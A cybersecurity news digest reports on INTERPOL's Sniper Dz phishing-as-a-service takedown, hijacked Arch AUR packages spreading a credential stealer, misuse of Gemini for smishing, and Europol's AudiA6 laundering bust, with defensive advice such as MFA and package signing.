INTERPOL Just Arrested 201 People Running a Phishing Store
Operation Ramz took down Sniper Dz — a platform that let anyone rent a complete phishing kit for a few dollars a month. 201 arrests across 13 countries. Plus: 400+ Arch Linux packages hijacked to steal credentials, and Europol dismantles a €336M crypto laundering service.
Friday, June 12, 2026 · 5-minute read
🌐 World Intel
Attackers took over more than 400 packages in the Arch Linux User Repository (AUR) by exploiting abandoned or poorly maintained accounts. They modified the build scripts — instructions that compile the software from source code — to install a Rust-based credential stealer. When run with administrator privileges, the stealer also deploys an eBPF rootkit that actively conceals itself from security tools running on the same machine. AUR packages are community-maintained and don't go through the same vetting as official Arch packages — this is a known risk of the ecosystem, and the attack hit at scale. Arch Linux users should audit all AUR packages installed in the past 30 days.
Source: The Hacker NewsGoogle filed a lawsuit against a Chinese cybercrime network it says used the Gemini AI platform to generate convincing smishing pages and send mass phishing texts impersonating well-known American brands. The attackers used Gemini to produce realistic fake login pages at speed — a task that would have required skilled designers doing manual work in years past. Google's complaint centers on terms-of-service violations and seeks to establish legal precedent around AI-assisted fraud. It's one of the first lawsuits to specifically name generative AI as the tool of crime rather than a passive enabler.
Source: The Hacker NewsEuropol announced the takedown of AudiA6, a cryptocurrency money laundering service used by ransomware gangs to clean their proceeds. AudiA6 had processed an estimated €336 million (~$389 million) since launching in 2021. The service functioned as a middleman: ransomware operators sent cryptocurrency to AudiA6, which mixed and converted it through layers of transactions to obscure its origin. Europol arrested the operators and seized infrastructure. The takedown removes a key financial artery for multiple ransomware groups simultaneously — unlike targeting individual gangs, disrupting the laundering layer hits all their customers at once.
Source: The Hacker News⚔️ Active Attacks
INTERPOL coordinated a takedown of Sniper Dz — a phishing-as-a-service platform that had been operating since 2015 and collected over 45,000 victim records. Operation Ramz resulted in 201 arrests across 13 countries. Sniper Dz let criminals rent complete phishing kits — fake login pages, victim tracking dashboards, and management tools — without needing any technical skills to set them up. The platform charged a monthly fee, similar to any subscription software service. When INTERPOL analyzed the victim data, they found credentials from banks, corporate email systems, and social media accounts across dozens of countries.
What you can do: If you received a suspicious login alert or noticed an unauthorized login between 2015 and today on a major account, change that password. Enable multi-factor authentication (MFA) on any account that supports it. Phishing-as-a-service victims are often unaware their credentials were stolen until they show up in a breach database — check haveibeenpwned.com to see if your email appears in known breaches.
Source: The Hacker News🔓 New Vulnerabilities
Over 400 packages in the Arch Linux AUR were modified to deliver a credential stealer and eBPF rootkit. The AUR is community-maintained and explicitly carries higher risk than official Arch repositories. This is a supply chain attack exploiting weak account security on package maintainer accounts.
Arch Linux users: audit AUR packages from the past 30 days. Check the Arch Linux security advisories for the list of affected package names. Prefer official repository packages where possible. Enable 2FA on AUR maintainer accounts if you maintain packages.
Not a technical vulnerability in Gemini — rather, systematic misuse of the AI platform to generate convincing phishing pages at scale. AI-generated phishing content is significantly harder to detect than template-based attacks because each generation can be slightly different, evading pattern-based filters.
AI-assisted phishing is increasingly indistinguishable from legitimate communications. Trust less on appearance alone; verify requests for credentials or payments through independent channels.
AudiA6 processed €336 million in criminal cryptocurrency since 2021. Its disruption removes a shared financial service layer that multiple ransomware and cybercrime groups depended on, potentially disrupting their ability to convert cryptocurrency proceeds into usable funds.
No direct user action needed. The takedown demonstrates that financial infrastructure disruption is an effective law enforcement strategy against the ransomware ecosystem.
🛠 New Tech
The AUR supply chain attack is a reminder that open-source package ecosystems need better account security. Several tools are emerging to help. Socket.dev analyzes npm, PyPI, and other packages for malicious behavior before you install them — it looks for things like new network connections, file system writes, and changed maintainers that weren't there before. Sigstore is a free, open standard for cryptographically signing software packages, so developers and users can verify a package was published by the person who actually owns the project. Major ecosystems including npm, Python, and Maven are adopting Sigstore signing. For organizations that depend on open-source software, requiring packages to be Sigstore-signed is becoming a practical baseline policy, not a future aspiration.
💡 Deep Dive
Running a fishing operation used to require equipment: rods, lines, hooks, bait, a boat. You needed to know what you were doing. Phishing operations used to be similar — you needed to build convincing fake websites, set up infrastructure to collect credentials, write persuasive emails, and manage the technical side of staying online while law enforcement looked for you. That barrier kept the crime somewhat limited to people with real technical skills.
Phishing-as-a-service removes all of that.
Sniper Dz, taken down this week by INTERPOL's Operation Ramz, worked exactly like a subscription software product. You signed up, paid a monthly fee, chose from a menu of fake login pages impersonating banks, social media, and corporate email systems, pointed your victims at a provided link, and logged into a dashboard to see their stolen credentials arrive in real time. No coding. No server management. No design work. Just choose your target and start sending links.
The platform had been running since 2015. Over 11 years, it collected more than 45,000 victim records — credentials from real people at banks, companies, and social media platforms across the world. The monthly fee model meant Sniper Dz had recurring revenue, just like any legitimate SaaS company. Lowering the technical barrier to crime dramatically expanded who could participate.
INTERPOL coordinated the response across 13 countries. That's the other side of the story: international cybercrime enforcement is genuinely hard. A crime that starts in one country, routes through servers in three others, targets victims in a dozen more, and is operated by people in yet another jurisdiction requires every involved country to cooperate simultaneously. Operation Ramz got 13 countries to move together, resulting in 201 arrests.
The takedown is real. But it's also worth being clear-eyed about what follows. Sniper Dz will be replaced. It may already have successors. The demand for easy phishing-as-a-service platforms doesn't disappear because one platform does. The practical defense is the same it's always been: a stolen password is much less useful when multi-factor authentication is enabled. A phishing link that captures your credentials still fails if logging in also requires a code only you can see. Turn on MFA everywhere you can.